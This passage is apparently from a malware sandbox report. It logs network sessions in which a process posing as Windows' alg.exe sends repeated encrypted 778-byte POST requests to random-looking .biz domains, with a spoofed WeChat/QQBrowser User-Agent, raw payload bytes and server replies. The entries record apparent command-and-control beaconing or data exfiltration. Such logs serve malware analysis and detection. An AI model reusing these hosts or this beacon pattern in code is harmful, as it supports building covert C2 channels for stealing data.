                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114939928 CET778OUTData Raw: 44 1b df 69 3c a1 44 92 fe 02 00 00 82 7f 0a 74 1d 84 e6 c1 c3 9a 59 17 ad df 73 e3 b0 78 bd c0 b3 48 f2 5e e8 25 be 69 ac bc 6f 02 36 ce 2e 21 ec 0b ae ee 7c 22 24 c2 e9 e0 d1 c5 a9 03 66 2e 98 2d cd 83 10 83 83 66 96 54 f7 12 ca 2a 3c 4e 22 67
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Di<DtYsxH^%io6.!|"$f.-fT*<N"gQoFBp"OU%#Sko{czuh%v)Gh(#g4AV_~k[^TbuC~oB}*EBq"}B'5u_^&mT\q Qoqu %3
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.666467905 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cbfd2d820016f0c892f4b27ae6c5ed5e|155.94.241.188|1730130680|1730130680|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  43192.168.2.55001913.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711174965 CET345OUTPOST /os HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711263895 CET778OUTData Raw: 65 f4 be 2e ea 3d 9c ab fe 02 00 00 80 24 45 f7 82 fe c0 0f e1 22 b2 d1 f3 f4 b0 c8 e1 c6 34 d9 7a a8 4d f8 1f b7 b2 e8 f5 a5 e8 ac 12 31 d2 f5 8f 25 73 1a fd b3 f9 f8 39 08 aa 7a 0b 9a f7 ea da bd 47 f7 ab c0 16 9c 81 89 a9 4a 26 52 26 63 31 14
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: e.=$E"4zM1%s9zGJ&R&c1<4fOP8i![aFW6ztJ&?HG\c(LDUM<<i#Ecw(wu/BL$xS>evixo T+pQfA[G~`UG
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.141578913 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a06737c0bbfe46918bf2ee61305e1177|155.94.241.188|1730130681|1730130681|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  44192.168.2.55002034.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354965925 CET347OUTPOST /rwiegx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354965925 CET778OUTData Raw: 85 b5 9a bd 52 46 47 db fe 02 00 00 4e 35 c5 7a e1 bf d6 19 56 8f 7d a7 f2 dc 93 39 47 fa b5 26 c9 64 d4 dc 6f d0 6b 14 36 cf d8 65 a7 1e 2a 12 f4 6c 81 e1 98 42 e1 ec a4 b5 5f 82 72 0c 77 74 7e c0 c3 59 39 44 e5 17 1d 36 f3 e1 c4 e7 03 02 59 20
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: RFGN5zV}9G&dok6e*lB_rwt~Y9D6Y %\N"2+V1MT-oVo1GUxuxY4uJSvvo8--(*4&(>SSC#c oxw$3o\]%cO$+_&EB
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.198287964 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=31f5aaf10675ccea18e9f158b032ed9e|155.94.241.188|1730130683|1730130683|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  45192.168.2.5500213.94.10.34802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.225449085 CET359OUTPOST /vrhdofwiluexay HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.225483894 CET778OUTData Raw: ae 6d c8 65 36 b6 8a 86 fe 02 00 00 1b 81 4b cc 10 fc 34 82 3f 41 18 da 5b b8 7c dd 47 59 af a9 3d 1e d8 c0 65 0c 33 08 af 4d 80 bc 10 b9 80 47 dd bd 05 75 e3 05 ef 15 68 fd 9f 97 10 d2 10 d8 69 b0 c4 24 59 ca d8 73 ec 26 e5 97 02 fe 35 32 47 69
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: me6K4?A[|GY=e3MGuhi$Ys&52Gi0ZjQj?mi;8j{RMb2^CXFMw?X^m\s>6:SgKRII9Cd|C06?'@EzGsMc@qvf5m
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.939027071 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d7bef593e641c40cb5cd6ad8565e0baf|155.94.241.188|1730130683|1730130683|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  46192.168.2.55002218.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.197026968 CET355OUTPOST /oomorpsdyukh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.197052956 CET778OUTData Raw: 0b d3 76 cc 7d ff a7 55 fe 02 00 00 61 c6 bb 6e c1 7b 2e d4 3d f6 5b 69 3f b5 ab 77 e1 91 40 92 5f 0b 6f 91 71 b5 1d 3a b2 b0 51 f9 ea 02 ce 34 da 63 91 77 d4 4e 3e bf 5a a3 18 a9 9a 9d b4 5f 61 b9 d7 90 ee ea 22 8f a2 f9 7b e8 db 3f 2e 84 ee a0
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: v}Uan{.=[i?w@_oq:Q4cwN>Z_a"{?.FXu/l_hOB*m5?#Zzjo7+8M-ViO#0H-#JXPa6.u$0?+q#42zdpI@k
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.039685965 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8f48227fd87f84ed307ae474cf87c19e|155.94.241.188|1730130684|1730130684|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  47192.168.2.5500233.254.94.185802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.065527916 CET342OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.065555096 CET778OUTData Raw: 34 8a a4 73 62 70 e9 ff fe 02 00 00 65 71 14 b8 03 6d d2 9c a7 24 15 7c 55 d0 a3 7c 6c 7c d9 f4 7c 86 85 63 9f eb 63 9b 66 07 1f cf 43 fd a7 50 58 f5 cf ad ef 13 5e 18 28 9c 6c 63 d8 e1 df 56 9d ed 03 2f a7 d4 49 f2 11 81 a0 0c 3c 75 95 96 c1 ac
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 4sbpeqm$|U|l||ccfCPX^(lcV/I<u"_b.v@<5J%c`Tm+^mY/N]YOG q_ QP[7x$$wJ^_NFF0"-pu4tY?F:P1Ce[[|7dM^t6 869\
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.040486097 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=0182ec542ccc986bc48b61aad71e0085|155.94.241.188|1730130685|1730130685|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  48192.168.2.55002485.214.228.140802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.085664034 CET346OUTPOST /og HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.085680008 CET778OUTData Raw: f6 81 8f c5 b0 3a ec 54 fe 02 00 00 45 05 68 c7 ce 7e c6 f9 80 60 d7 6a c7 57 3c 84 f1 3d af 8d 4f 00 b2 12 ea 02 32 f0 df 82 75 40 f8 69 18 04 e7 b5 a8 30 18 24 f7 36 c8 00 60 8e d1 78 85 b6 fa c9 2d d4 fa b6 b5 ed 60 04 c0 45 4e 31 b5 b6 4e df
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: :TEh~`jW<=O2u@i0$6`x-`EN1N8xrvn,lnS.w}cLD#Kv/]-dPSL)EGCJGP{R9Goa.[Zr<&O~eds`79'?N 8=Lh
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.957945108 CET161INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.958076000 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  49192.168.2.55002547.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.002204895 CET348OUTPOST /qmncq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.002233982 CET778OUTData Raw: b9 8f 7d 4c 46 97 9c 91 fe 02 00 00 30 c1 32 03 7e 80 8a 7d 79 17 3d b3 e5 d0 b1 0a c2 d6 b3 4b ba 0b 01 f1 ef d6 67 78 64 b2 38 8b 30 15 2f 68 84 f7 21 0e d7 83 f7 5e 50 fb e8 60 4c 19 49 f1 12 cf ec 38 5b 7e 41 14 4b 81 4c eb 73 0e b3 03 ad 3e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: }LF02~}y=Kgxd80/h!^P`LI8[~AKLs>B!~$^,S\[CiXJ]\GN.GWTmH?)ueD$S%X))d83pZqeLf}~^/"nJw4Lj
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.444619894 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a84a75e2649846174081033305746396|155.94.241.188|1730130688|1730130688|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  50192.168.2.55002634.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.466916084 CET348OUTPOST /iboogqv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.467176914 CET778OUTData Raw: 76 f0 21 5c 33 45 bb 0a fe 02 00 00 40 a2 1d 21 6a 1c 02 8e 48 bf cb 4f bb 24 c2 ef 5b 20 3c 94 70 c3 ad 0a 91 30 fe 4e 33 fa cb e6 48 3c 32 5e 39 04 72 6d 86 8d a9 58 1d 07 bd 0a 0f ba 52 cc 69 91 ac 32 36 cf 3c 4a 5d 32 d0 b1 46 b8 a0 d5 cb e7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: v!\3E@!jHO$[ <p0N3H<2^9rmXRi26<J]2FD B@Euju\p&Aq8wV#b423fZDr)r1aMg4R-J \M@KK(Qv&OUw~kFrZ\>$'2jz(
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.299953938 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=b694acb1b35dc654f2824eff545a7bb9|155.94.241.188|1730130689|1730130689|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  51192.168.2.55002747.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680797100 CET353OUTPOST /pcwhdleqsuu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680833101 CET778OUTData Raw: ff d7 82 18 03 ea 30 9d fe 02 00 00 34 2d 56 a7 21 07 52 57 64 f6 61 30 11 02 d9 0d b1 0c a6 d6 94 9c 40 6e 64 b3 e8 7c 7f 2b 82 53 12 e9 6d 2a 52 60 85 bd b7 c4 ff 1d 77 f0 03 c5 b3 1f b6 e2 87 48 f8 8a 97 a1 26 98 66 9e 6b 5b 04 6e 42 bb 35 db
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 04-V!RWda0@nd|+Sm*R`wH&fk[nB5u<Lw!L6:xO\^heL@*Pmze(qa\gX1inX5wt@.PJ0i1"NZ#Ye5Z#-cy^!`e'e
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.090712070 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=efe4555ddffce5c8d37a0630839d1a55|155.94.241.188|1730130690|1730130690|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  52192.168.2.55002818.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147864103 CET353OUTPOST /xcibcauw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
